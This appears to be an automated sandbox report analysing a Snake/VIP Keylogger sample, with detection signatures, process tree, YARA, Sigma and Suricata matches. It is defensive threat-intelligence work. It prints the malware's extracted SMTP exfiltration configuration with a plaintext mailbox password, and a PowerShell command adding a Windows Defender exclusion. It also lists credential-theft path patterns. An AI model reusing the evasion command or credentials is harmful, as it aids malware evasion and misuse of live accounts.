Edit tour

Windows Analysis Report
3GrfjMY0pG.exe

Overview

General Information

Sample name:	3GrfjMY0pG.exe renamed because original name is a hash value
Original sample name:	6506e06b9b96e41137ca0ff6be68c11c31804d350277ef345454459d4c2228bf.exe
Analysis ID:	1632224
MD5:	81c7a597ad8d19b00d5659cd0dbbe2f7
SHA1:	ec0f5b404d99a1b5cc71833974d033b7b512dcbf
SHA256:	6506e06b9b96e41137ca0ff6be68c11c31804d350277ef345454459d4c2228bf
Tags:	exeVIPKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

3GrfjMY0pG.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: 81C7A597AD8D19B00D5659CD0DBBE2F7)

powershell.exe (PID: 476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

3GrfjMY0pG.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: 81C7A597AD8D19B00D5659CD0DBBE2F7)

svchost.exe (PID: 6084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x370058:$a1: get_encryptedPassword 0x3b3078:$a1: get_encryptedPassword 0x3f5e98:$a1: get_encryptedPassword 0x3705e0:$a2: get_encryptedUsername 0x3b3600:$a2: get_encryptedUsername 0x3f6420:$a2: get_encryptedUsername 0x36fccb:$a3: get_timePasswordChanged 0x3b2ceb:$a3: get_timePasswordChanged 0x3f5b0b:$a3: get_timePasswordChanged 0x36fde2:$a4: get_passwordField 0x3b2e02:$a4: get_passwordField 0x3f5c22:$a4: get_passwordField 0x37006e:$a5: set_encryptedPassword 0x3b308e:$a5: set_encryptedPassword 0x3f5eae:$a5: set_encryptedPassword 0x372d8a:$a6: get_passwords 0x3b5daa:$a6: get_passwords 0x3f8bca:$a6: get_passwords 0x37311e:$a7: get_logins 0x3b613e:$a7: get_logins 0x3f8f5e:$a7: get_logins
Process Memory Space: 3GrfjMY0pG.exe PID: 6956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6956	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6956	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6956	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6956	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9dadb:$a1: get_encryptedPassword 0x9df74:$a2: get_encryptedUsername 0x9d770:$a3: get_timePasswordChanged 0x9d87b:$a4: get_passwordField 0x9daf1:$a5: set_encryptedPassword 0xa0303:$a6: get_passwords 0xa05da:$a7: get_logins 0xa02ef:$a8: GetOutlookPasswords 0x9fd31:$a9: StartKeylogger 0xa0548:$a10: KeyLoggerEventArgs 0x9fdd1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 3GrfjMY0pG.exe PID: 6092	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6092	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6092	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 3GrfjMY0pG.exe PID: 6092	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8c9f7:$a1: get_encryptedPassword 0x8cf75:$a2: get_encryptedUsername 0x8c679:$a3: get_timePasswordChanged 0x8c790:$a4: get_passwordField 0x8ca0d:$a5: set_encryptedPassword 0x8f6d1:$a6: get_passwords 0x8fa61:$a7: get_logins 0x8f6bd:$a8: GetOutlookPasswords 0x8f076:$a9: StartKeylogger 0x8f9ba:$a10: KeyLoggerEventArgs 0x8f116:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.3GrfjMY0pG.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.3GrfjMY0pG.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.3GrfjMY0pG.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.3GrfjMY0pG.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
5.2.3GrfjMY0pG.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b26e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a911:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab6e:$a4: \Orbitum\User Data\Default\Login Data 0x3b54d:$a5: \Kometa\User Data\Default\Login Data
5.2.3GrfjMY0pG.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3946e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b11:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d6e:$a4: \Orbitum\User Data\Default\Login Data 0x3974d:$a5: \Kometa\User Data\Default\Login Data
0.2.3GrfjMY0pG.exe.4f303b8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b26e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a911:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d931:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab6e:$a4: \Orbitum\User Data\Default\Login Data 0x7db8e:$a4: \Orbitum\User Data\Default\Login Data 0xc09ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b54d:$a5: \Kometa\User Data\Default\Login Data 0x7e56d:$a5: \Kometa\User Data\Default\Login Data 0xc138d:$a5: \Kometa\User Data\Default\Login Data
0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb50c0:$a1: get_encryptedPassword 0xf80e0:$a1: get_encryptedPassword 0x13af00:$a1: get_encryptedPassword 0xb5648:$a2: get_encryptedUsername 0xf8668:$a2: get_encryptedUsername 0x13b488:$a2: get_encryptedUsername 0xb4d33:$a3: get_timePasswordChanged 0xf7d53:$a3: get_timePasswordChanged 0x13ab73:$a3: get_timePasswordChanged 0xb4e4a:$a4: get_passwordField 0xf7e6a:$a4: get_passwordField 0x13ac8a:$a4: get_passwordField 0xb50d6:$a5: set_encryptedPassword 0xf80f6:$a5: set_encryptedPassword 0x13af16:$a5: set_encryptedPassword 0xb7df2:$a6: get_passwords 0xfae12:$a6: get_passwords 0x13dc32:$a6: get_passwords 0xb8186:$a7: get_logins 0xfb1a6:$a7: get_logins 0x13dfc6:$a7: get_logins
0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c4e0:$a1: get_encryptedPassword 0x17f500:$a1: get_encryptedPassword 0x1c2320:$a1: get_encryptedPassword 0x13ca68:$a2: get_encryptedUsername 0x17fa88:$a2: get_encryptedUsername 0x1c28a8:$a2: get_encryptedUsername 0x13c153:$a3: get_timePasswordChanged 0x17f173:$a3: get_timePasswordChanged 0x1c1f93:$a3: get_timePasswordChanged 0x13c26a:$a4: get_passwordField 0x17f28a:$a4: get_passwordField 0x1c20aa:$a4: get_passwordField 0x13c4f6:$a5: set_encryptedPassword 0x17f516:$a5: set_encryptedPassword 0x1c2336:$a5: set_encryptedPassword 0x13f212:$a6: get_passwords 0x182232:$a6: get_passwords 0x1c5052:$a6: get_passwords 0x13f5a6:$a7: get_logins 0x1825c6:$a7: get_logins 0x1c53e6:$a7: get_logins
0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6484:$s1: UnHook 0xf94a4:$s1: UnHook 0x13c2c4:$s1: UnHook 0xb648b:$s2: SetHook 0xf94ab:$s2: SetHook 0x13c2cb:$s2: SetHook 0xb6493:$s3: CallNextHook 0xf94b3:$s3: CallNextHook 0x13c2d3:$s3: CallNextHook 0xb64a0:$s4: _hook 0xf94c0:$s4: _hook 0x13c2e0:$s4: _hook
0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13d8a4:$s1: UnHook 0x1808c4:$s1: UnHook 0x1c36e4:$s1: UnHook 0x13d8ab:$s2: SetHook 0x1808cb:$s2: SetHook 0x1c36eb:$s2: SetHook 0x13d8b3:$s3: CallNextHook 0x1808d3:$s3: CallNextHook 0x1c36f3:$s3: CallNextHook 0x13d8c0:$s4: _hook 0x1808e0:$s4: _hook 0x1c3700:$s4: _hook
0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3GrfjMY0pG.exe", ParentImage: C:\Users\user\Desktop\3GrfjMY0pG.exe, ParentProcessId: 6956, ParentProcessName: 3GrfjMY0pG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", ProcessId: 476, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3GrfjMY0pG.exe", ParentImage: C:\Users\user\Desktop\3GrfjMY0pG.exe, ParentProcessId: 6956, ParentProcessName: 3GrfjMY0pG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", ProcessId: 476, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6084, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:08:31.719830+0100	2803305	3	Unknown Traffic	192.168.2.11	49704	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:08:26.773785+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49699	193.122.6.168	80	TCP
2025-03-07T21:08:29.289655+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49699	193.122.6.168	80	TCP
2025-03-07T21:08:32.461250+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49706	193.122.6.168	80	TCP
2025-03-07T21:08:35.226912+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49709	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:08:54.381923+0100	1810007	1	Potentially Bad Traffic	192.168.2.11	49721	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3GrfjMY0pG.exe

Avira: detected

Found malware configuration

Source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587"}
Source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: 3GrfjMY0pG.exe	Virustotal: Detection: 75%			Perma Link
Source: 3GrfjMY0pG.exe	ReversingLabs: Detection: 71%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: logs@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: mail.aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: log@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 587
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor:
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: logs@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: mail.aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: log@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 587
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor:
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: logs@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: mail.aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: log@aewn.buzz
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor: 587
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 3GrfjMY0pG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49710 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49721 version: TLS 1.2

Source: 3GrfjMY0pG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Jmdv.pdbSHA2560y* source: 3GrfjMY0pG.exe
Source:	Binary string: Jmdv.pdb source: 3GrfjMY0pG.exe

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	0_2_01623E0C
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 0147F8E9h	5_2_0147F631
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 0147FD41h	5_2_0147FA88
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9E959h	5_2_06C9E6B0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C931E0h	5_2_06C92DC8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C90D0Dh	5_2_06C90B30
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C91697h	5_2_06C90B30
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C92C19h	5_2_06C92968
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9E0A9h	5_2_06C9DE00
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9F209h	5_2_06C9EF60
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9CF49h	5_2_06C9CCA0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C931E0h	5_2_06C92DBE
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9D7F9h	5_2_06C9D550
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9E501h	5_2_06C9E258
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9F661h	5_2_06C9F3B8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9EDB1h	5_2_06C9EB08
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9D3A1h	5_2_06C9D0F8
